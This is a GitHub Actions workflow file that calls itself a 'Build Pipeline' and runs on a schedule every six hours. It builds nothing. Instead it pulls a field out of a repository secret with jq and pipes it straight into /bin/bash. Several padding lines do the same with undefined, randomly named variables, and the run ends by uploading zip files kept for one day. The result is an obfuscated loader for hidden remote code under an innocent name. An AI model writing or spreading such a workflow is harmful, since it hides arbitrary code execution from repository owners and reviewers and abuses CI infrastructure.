name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '0 0,6,12,18 * * *'
permissions:
  contents: read
  actions: read
env:
  RUNNER_DEBUG: 0
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  invoke:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run pipeline
        env:
          pckey0: ${{ secrets.pckey0 }}
        run: |
          printf '%s' "$pckey0" | jq -r .phxgd0 | /bin/bash
          printf '%s' "$is5476" | jq -r .i03 | /bin/bash
          echo $hnos375 | jq -r .uzda007 | /bin/bash
          echo $bzgu54 | jq -r .y835 | /bin/bash
          printf '%s' "$ggg070" | jq -r .weins0 | /bin/bash
          echo $lh0 | jq -r .zwp368 | /bin/bash
          echo $j55 | jq -r .vlfw29 | /bin/bash

      - name: Upload archive
        uses: actions/upload-artifact@v4
        with:
          name: rsc5BS4l
          path: "*.zip"
          retention-days: 1
